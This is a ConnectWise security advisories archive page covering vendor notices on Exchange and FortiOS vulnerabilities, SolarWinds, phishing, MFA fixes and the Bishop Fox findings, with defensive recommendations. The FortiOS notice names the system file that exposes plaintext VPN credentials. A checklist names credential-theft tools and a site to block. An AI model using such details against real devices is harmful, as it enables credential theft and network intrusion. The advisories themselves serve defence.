Get Support

Request a Quote

Platform
PSA and RMM

PSA

RMM

CPQ

Remote Access

Reporting

Documentation

Payments

Customer Feedback

Solve any challenge with one platform

Operate more efficiently, reduce complexity, improve EBITDA, and much more with the purpose-built platform for MSPs.

Explore the Platform

Cloud Services Hub and Portal Log-in

Explore ConnectWise Cloud Backup, SaaS Security, and more in our Cloud Services hub!
Cybersecurity and Data Protection

MDR

SIEM

Cloud Backup

BCDR

Email Security

x360Recover

SaaS Security

Vulnerability Management

Ensure security and business continuity, 24/7

Protect and defend what matters most to your clients and stakeholders with ConnectWise's best-in-class cybersecurity and BCDR solutions.

Explore Cyber and BCDR

Cloud Services Hub and Portal Log-in

Explore ConnectWise Cloud Backup, SaaS Security, and more in our Cloud Services hub!
Automation and Integrations

RPA

Sidekick

Integrations

Integrate and automate to unlock cost savings

Leverage generative AI and RPA workflows to simplify and streamline the most time-consuming parts of IT.

Explore Our Marketplace

Cloud Services Hub and Portal Log-in

Explore ConnectWise Cloud Backup, SaaS Security, and more in our Cloud Services hub!
Solutions
By Use Case

Client Onboarding

Increase agility and reduce complexity

Service Desk Ticketing

Deliver fast and efficient service

Cyber Remediation

Deliver holistic cybersecurity and data protection

Billing Reconciliation

Error-free invoicing and revenue protection

Patch Management

Automate patching across all your endpoints

Endpoint Management

Get complete clarity and command over every device

The first and only true MSP platform
By Market

MSPs

Purpose-built MSP solutions to accelerate profitability and growth

IT Departments

IT service management (ITSM) software and cybersecurity for IT teams

Managed Print

Print security, event management, and monitoring

VAR

Proven as-a-service offerings and integrations

The first and only true MSP platform
By Category

Business Management

Streamline end-to-end business management with robust professional services automation

Unified Monitoring & Management

Unlock workflows, automation, and insights you can’t get anywhere else with one suite of solutions

Cybersecurity & Data Protection

Get the software, services, and support you need to sell and secure your clients 24/7

Expert Services

Expert MSP Support and Help Desk Services

The first and only true MSP platform
Community
IT Nation

IT Nation Evolve™

Accelerate your MSP business growth with the premier annual membership program and peer experience focused on planning, accountability, and success

IT Nation Connect™ Global 

Join the groundbreaking MSP community at the can't-miss industry conference for education, inspiration, and networking. Attendees return year after year to be part of a collaborative community focused on helping individuals solve business challenges and grow. 

Service Leadership, Inc.®

Drive financial performance and Operational Maturity Level™ through benchmarking, advanced peer groups, industry best practices, education, and speaking.

Let’s meet up at the industry’s largest MSP event! 
Events

IT Nation Connect Global

November 4-6, 2026 | Orlando

IT Nation Connect Europe

March 9-11, 2026 | London

IT Nation Connect ANZ

August 26-28, 2026 | Sydney

IT Nation Grow

December 10-11, 2025 | Tampa

PitchIT

Apply Today for your chance at $100K in prize money!

Explore all ConnectWise Events

Join fellow IT pros at ConnectWise industry & customer events!

Explore Today

Let’s meet up at the industry’s largest MSP event! 
University

Product Training

Calendar

What's New

University Log-In

Check out our online learning platform, designed to help IT service providers get the most out of ConnectWise products and services.

ConnectWise University

Explore our product training course catalog.
Resources

Webinars

Blog

eBooks

Case Studies

Resources

Feature Sheets

On-demand Demos

Live Demos

Cybersecurity Glossary

Product Roadmap

Explore the ConnectWise Resource Center

Search our resource center for the latest MSP ebooks, white papers, infographics, webinars and more!

Explore Today

Explore the latest product innovations designed to enhance your ConnectWise experience.
About Us
About Us

Mission & Values

Careers

Leadership

Board of Directors

Philanthropy

Experience the ConnectWise Way

Join hundreds of thousands of IT professionals benefiting from and contributing to a legacy of industry leadership when you become a part of the ConnectWise community.

Learn More

Transform your business with the ConnectWise community
News and Press

Press Room

Awards

Case Studies

Experience the ConnectWise Way

Join hundreds of thousands of IT professionals benefiting from and contributing to a legacy of industry leadership when you become a part of the ConnectWise community.

Learn More

ConnectWise Partner Success Stories
ConnectWise

Advisories Archive

From time to time, ConnectWise will provide communications on broader security related topics that may not be linked to a specific ConnectWise product or vulnerability, but are still of importance to our partner community.

Important Microsoft Exchange Server Vulnerability – Patches Available

Microsoft has released critical patches for Microsoft Exchange Server zero-day vulnerabilities that are being actively exploited by a nation-state affiliated group. These vulnerabilities affect on-premises Exchange Servers 2010, 2013, 2016, and 2019. If you’re hosting an Exchange server, we recommend applying patches immediately for:

More background and details can be found here.

ConnectWise SOC PSA: Fortinet FortiOS Vulnerability

Active exploits of a critical vulnerability in Fortinet’s FortiOS have been observed by the ConnectWise SOC. We urge all partners and clients to review their FortiGate Firewalls and ensure they are fully patched against CVE-2018-13379.

This vulnerability allows unauthenticated attackers to obtain FortiOS system files via a specially crafted HTTP request. Attackers are using this to access the /dev/cmdb/sslvpn_websession file, exposing plaintext credentials for logged-in SSL VPN users.

Due to the common use of ADsync and credential reuse, this poses a serious risk of domain and email compromise, and provides a direct path into client networks via SSL VPN.

Recommendations:

  • Patch all affected FortiGate devices immediately
  • Reset domain and email credentials for any potentially affected clients

ConnectWise is actively reaching out to partners potentially impacted. This issue is unrelated to ConnectWise products or services.

Sources:

ConnectWise Control & Iranian hacker activity

February 11, 2021

ConnectWise Control has not been hacked or compromised in any way. An Iranian hacker group, disguising their origin by routing through US/UK/EU IP addresses, obtained instances of ConnectWise Control (formerly ScreenConnect) and used it along with trojan files containing the agent installer to compromise other organizations. Two prominent security research firms have reported this to us independently and we corroborated their findings.

The hacker group compromised the victim organizations using email phishing campaigns resulting in the installation of the ConnectWise Control agent. Subsequently, they used Control's intended functionality to execute commands on the victim’s systems.

ConnectWise takes the abuse of its products and services seriously. While we strive to follow industry best practices, detecting all instances of abuse is a continuing challenge for all in our industry.

Security Advisory - SolarWinds & FireEye

December 15, 2020

As you’ve likely seen reported, SolarWinds discovered a supply chain attack compromising their Orion business software updates that distributed malware known as SUNBURST. The malware permits an attacker to gain access to network traffic management systems, and the attacker can leverage this to gain elevated credentials. This compromise was used to target the cybersecurity firm FireEye, as well as multiple U.S. government agencies. For more information, see the advisory from the Cybersecurity & Infrastructure Security Agency.

ConnectWise Actions for our Product Security

ConnectWise does not use any SolarWinds or FireEye products internally. However, we are following the developments closely and validating our processes and environment as new information becomes available.

The security of our products, our partners, and partner data is critically important. While we have no evidence of impact, we are taking the following actions:

  • Our Security Operations Center (SOC) continues to monitor the situation. The SOC has blacklisted known IOCs related to the compromised files globally on our SentinelOne consoles.
  • Although ConnectWise is not affected, we are using this event to improve our processes and controls.

Recommendations for Partners

If your organization uses SolarWinds, stay current on their recommendations and hotfixes. Review their Security Advisory page for updates.

If you suspect malicious or fraudulent activity within our products, report it to our InfoSec team at security@connectwise.com.

Additional Resources

We will continue to provide updates. Please bookmark our Security Trust page for ongoing information.

Thank you,
The ConnectWise InfoSec Team

ConnectWise Security: Public Service Announcement

October 31, 2020

In light of the upcoming elections and recent cyber-attacks on health care systems, there have been reported increases in cyber-attacks on MSPs with attackers seeking to obtain MSP credentials to ConnectWise and similar products by exploiting weaknesses in MSP security protocols and infrastructures.

We are aware of active threats using attack methods to compromise credentials. The safety and security of our partners is a top priority. We encourage all MSPs to review their systems and follow these recommendations:

General Security Best Practices

  • Review running processes on all Domain Controllers to ensure no unexpected processes are active. Attackers may use hidden PowerShell scripts to avoid detection.
  • Enable two-factor authentication (2FA/MFA) on all accounts, including email.
  • Check for tools like Cobalt Strike and Mimikatz, which are used by ransomware actors to harvest credentials and maintain persistence.
  • If unusual PowerShell activity or unexpected tools are found, reset all user passwords after removal.
  • Block traffic to pastebin.com, a known site for malware distribution.

Security Best Practices for ConnectWise Products

  • In addition to MFA, restrict admin page access by IP, use complex passwords, and conduct regular account audits.
  • Block access to RDP and similar remote access services from the Internet.
  • For ConnectWise Control users, regularly audit the Toolbox directory at C:\Program Files (x86)\ScreenConnect\App_Data\Toolbox for unexpected files.

For more tips and guidance, visit the Security Journey on the ConnectWise University.

We strongly encourage all MSPs to review their security measures and implement the above suggestions. Visit our Trust Site regularly for updates and information.

Thank you for your attention to this important matter.

Stay safe,
ConnectWise InfoSec Team

Update on the ConnectWise Automate API Vulnerability Email Communication from June 22, 2020

June 22, 2020

The security of our partners is of paramount importance to ConnectWise. In line with our EULA, we continuously monitor product behavior to improve functionality and detect potential malicious activity. Following the Automate vulnerability and the hotfix implemented last week, we worked with several partners and identified some non-functioning agents on their Automate servers. While these are usually benign, we assessed the full scope and informed impacted partners so they could take appropriate action.

Update on the ConnectWise PSA™ Customer and Admin Portals

June 22, 2020

We have issued security bulletins on the ConnectWise PSA Customer and Admin portals. Please review the security bulletin tab.

Manage Customer and Admin Portals

June 21, 2020

Dear Partners,
Trusted advisors in our community have responsibly disclosed a potential issue involving the Manage Customer and Admin Portals. Out of an abundance of caution, we have placed both portals under maintenance while we address these reports and will follow with a Security Bulletin.

The Customer Portal remains accessible to those using external validation applications such as Google or Microsoft login. We anticipate an update by mid-day (ET) on Monday, June 22.

Thank you,
Tom Greco
Information Security Director

Security Updates for ConnectWise Control and ConnectWise Automate

May 15, 2020

ConnectWise Control

Earlier today, we identified a potential phishing scam using what appears to be a ScreenConnect URL via a website spoofing technique.

If you received this or a similar email, do not click any links and delete the email immediately. We have reported the malicious activity to the authorities.

If you accessed the malicious link, we recommend changing the credentials of any account you used or provided.

Always check URLs for slight spelling errors, which often indicate phishing. ConnectWise will never proactively email you to initiate a password change or confirm MFA enablement.

Thank you,
The ConnectWise Team

ConnectWise Automate

Earlier this afternoon, we were alerted to two attempted intrusions into on-prem Automate accounts via partner Admin Accounts that were not using MFA.

We strongly encourage updating your Automate system to version 2020.1 or higher. This version enforces MFA and complex passwords. Documentation is linked here.

If you need time to install the update, assign Admin permissions to a user with MFA enabled and delete the original Admin account. Contact support for assistance.

Thank you,
The Automate Team

Multi-Factor Authentication Details

MFA is enabled by default in versions 2020.1 and higher for users logging in with local credentials. Before upgrading, ensure:

  • Email settings are configured.
  • Each user has a unique and valid email address in their profile.

For more information, refer to the Multi-Factor Authentication for Automate documentation.

To prepare:

  • Configure email settings. If concerned about notifications or using PSA integration, refer to Control Ticket Messages to silence alerts.
  • Go to System > Users and Contacts > Users and ensure all users have a valid email address.

ConnectWise Control's Cloud Password Reset / MFA Risk has been Mitigated

February 5, 2020

On February 4, 2020, Huntress Labs contacted our ConnectWise Control team with a potential risk involving password resets and multi-factor authentication (MFA). Within two hours, our team mitigated the issue.

This configuration was limited to the cloud.screenconnect.com logon, which is solely for admin accounts and would require the attacker to have access to the email of the partner’s admin user. In this case, the password reset process sent a reset link via email to the admin user. After completing the reset, the user was logged in. The concern was that an attacker with access to the email could bypass MFA.

Password resets now require re-authentication, including MFA if configured, which mitigates this risk.

We have verified our mitigation and have asked Huntress Labs to verify as well.

For further questions or concerns, please contact Security@ConnectWise.com.

An Open Letter From Jason Magee Regarding The Bishop Fox Report Findings

January 24, 2020

Earlier this week, a story was published about potential security vulnerabilities with ConnectWise Control. In the spirit of transparency, I wanted to provide an update and outline what has been done and what our ongoing efforts are to ensure the security of our products, your business, and your customers.

In late September, ConnectWise received notification from a security consulting organization identifying eight potential vulnerabilities in ConnectWise Control. While many were considered low risk, we resolved six of them by October 2, 2019.

We proactively manage security through product updates, team education, and collaboration with third-party experts. Here’s what we’ve done:

  • Passed an independent SOC 2 Type 2 audit.
  • Conduct regular internal and external penetration tests, ethical hacker training, OWASP processes, and vulnerability assessments.
  • Implemented behavior analysis tools, machine learning for anomaly detection, and are launching a bug bounty program. MFA and SSO are being rolled out across the platform.
  • Invested in a developer security training curriculum in Q4 2019.
  • Launched the ConnectWise Security Trust site on January 21, 2020.
  • Engaged GuidePoint Security, LLC to validate patches and confirm mitigation. A matrix of vulnerabilities and responses has been published.
  • One remaining issue involves Cross-site Scripting (XSS) related to Control Administrator customization. This is considered low risk but will be removed from trial offerings.
  • The final issue concerns Security Headers. While not implemented, other security layers address the reported threats.

We will continue to post updates on our Security Trust site. I encourage you to check it regularly for the latest information and updates from our work with GuidePoint Security, LLC.

In our conversations with Huntress Labs, Kyle Hanslovan, CEO of Huntress Labs, shared his perspective on our findings.

“Bugs happen. And it’s not about when bugs happen, but it’s about what you do when they happen. We were happy to work with CRN earlier this week to confirm that ConnectWise had already patched 6 of the 8 items found. I think three things matter in this scenario: Were the bugs acknowledged, were the bugs fixed and was the company passionate about fixing them for the right reasons? I think ConnectWise came through on all three things, and after our positive conversation on January 23, we’re excited about continuing to work with ConnectWise and other vendors for the benefit of the channel as a whole.”

I want to assure our community that we understand the trust you place in our products and people. We take that trust seriously. You have our unrelenting commitment to security and transparency, and we appreciate your questions and feedback to our continuous improvement.

Updated Statement Regarding The Bishop Fox Report Findings

January 23, 2020

ConnectWise takes cybersecurity seriously and we realize that rumored and confirmed security incidents create stress and concern for our partners. Our partners and vendors can use Security@ConnectWise.com to report suspected security incidents or inquire about potential issues related to our products.

As part of our commitment to cybersecurity, ConnectWise recently passed an independent SOC 2 Type 2 audit. We regularly conduct penetration tests, implement ethical hacker training, follow OWASP processes, and run vulnerability assessments. We’ve also deployed tools to detect misuse, begun using machine learning for anomaly detection, and are launching a bug bounty program. MFA and SSO are being rolled out across the platform.

Immediately after CRN published articles on January 21, 2020, about potential vulnerabilities in ConnectWise Control, we reached out to Huntress Labs to discuss their analysis. The conversation was collaborative and constructive.

We also hired GuidePoint Security, LLC to assess the findings from Bishop Fox and Huntress Labs and conduct an independent vulnerability assessment. We will share more information as it becomes available.

We believe that mitigating cybersecurity threats starts with understanding them. Please review the FAQ about the security of ConnectWise Control in relation to the findings.

Original Statement Regarding The Bishop Fox Report Findings

January 22, 2020

In late September, ConnectWise received notification from Bishop Fox, a security consulting firm, about vulnerabilities in ConnectWise Control. We engaged in discussions with them and requested additional information to replicate their findings.

Bishop Fox could not provide further details as the attack chains were conceptual. Both parties agreed that no active exploits had occurred.

We took their insights seriously and resolved 6 of the 8 items by October 2, 2019. On January 21, 2020, we re-tested those items and confirmed they are secure. We plan to resolve a seventh item soon and consider the final item to pose no credible threat.

ConnectWise views security as a dynamic challenge and remains committed to optimizing protection for our partners. Please contact us at security@connectwise.com with any questions or concerns.